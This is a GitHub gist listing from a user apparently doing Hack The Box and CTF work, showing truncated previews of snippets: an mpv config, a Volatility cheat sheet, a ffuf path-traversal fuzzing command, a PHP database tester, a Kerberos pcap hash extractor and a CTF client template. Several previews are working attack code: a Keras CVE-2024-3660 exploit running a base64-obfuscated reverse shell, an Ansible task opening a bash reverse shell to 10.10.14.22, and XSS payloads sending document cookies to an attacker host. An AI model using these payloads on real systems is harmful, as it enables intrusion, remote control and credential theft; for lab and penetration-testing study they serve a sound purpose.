This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### ~/.config/mpv/input.conf | |
| # Left-mouse button for pause / play | |
| MBTN_LEFT cycle pause | |
| # Prevent the right-mouse button from pause / play | |
| MBTN_RIGHT ignore | |
| # Up / Down for volume instead of seek (No Display) | |
| UP add volume +5 | |
| DOWN add volume -5 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0.) Update: https://www.volatilityfoundation.org/releases | |
| 1.) General analysis (Mainly used to get Profiles) | |
| - volatility.exe -f file.raw imageinfo | |
| Eg: Suggested Profile(s) : Win7SP1x64, WinXPSP2x86, WinXPSP3x86 | |
| 2.) List Processes | |
| - volatility.exe -f file.raw --profile=ProfileFromAbove pslist |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Note: Lines start with a /, so any trailing / should be removed in the FUZZing | |
| https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Directory%20Traversal/Intruder/traversals-8-deep-exotic-encoding.txt | |
| cat traversals-8-deep-exotic-encoding.txt | sed 's/{FILE}/Windows\\win.ini/g' | ffuf -w - -u http://IP/downloadFUZZ -fc 302 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2024-3660 | |
| # https://nvd.nist.gov/vuln/detail/CVE-2024-3660 | |
| # https://www.oligo.security/blog/tensorflow-keras-downgrade-attack-cve-2024-3660-bypass | |
| import tensorflow as tf | |
| def exploit(x): | |
| import os | |
| os.system("echo YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjEwLjE0LjU4LzkwMDEgPCYx|base64 -d|bash") | |
| return x |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Thanks Gemini! | |
| import re | |
| import base64 | |
| # The 'cryptography' library is required to run this code. | |
| # You can install it in your local Python environment with: | |
| # pip install cryptography | |
| from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes | |
| from cryptography.hazmat.backends import default_backend |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - hosts: localhost | |
| tasks: | |
| - name: rev | |
| shell: bash -c 'bash -i >& /dev/tcp/10.10.14.22/443 0>&1' |
Reelix
/ genericdb.php
Last active
June 16, 2025 12:24
A simple PHP script to test for multiple DB connections in PHP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // File created by Reelix (HTB: Reelix) | |
| // Enter your Host, username, password, database below. | |
| $host = "IP_HERE"; | |
| $dbuser = "USERNAME_HERE"; | |
| $dbpass = "PASSWORD_HERE"; | |
| $db = "DATABASE_HERE"; | |
| $query = ""; | |
| if ($argc == 2) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Test For Image | |
| <img src='http://ip:port/xss' /> | |
| // Test For Fetch | |
| <img src=x onerror=fetch('http://ip:port/xss2') /> | |
| // Fetch Cookie Stealing | |
| <img src=x onerror=fetch('http://ip:port/cookie?cookie='+btoa(document.cookie)) /> | |
| // Fetch entire page contents |
Reelix
/ find-kerb.py
Last active
April 10, 2024 14:17
Find a kerberos handshake hash in a .pcap file in hashcat format
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import pyshark | |
| from pprint import pprint | |
| data = pyshark.FileCapture("C:/Reelix/HTB/Office/Latest-System-Dump-8fbc124d.pcap", display_filter="kerberos") | |
| print("Searching for Kerberos packets...") | |
| for pkt in data: | |
| if "Kerberos" in pkt: | |
| dirs = dir(pkt["Kerberos"]) | |
| if ("cnamestring" in dirs) and ("cipher" in dirs) and ("etype" in dirs) and ("realm" in dirs): |
Reelix
/ ConsoleApp.cs
Created
February 20, 2024 15:28
A template file for console-based CTF challenges that require interaction with a server in C#.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Net; | |
| using System.Net.Sockets; | |
| using System.Text; | |
| namespace ConsoleApp1 | |
| { | |
| internal class Program | |
| { | |
| static void Main(string[] args) | |
| { |
NewerOlder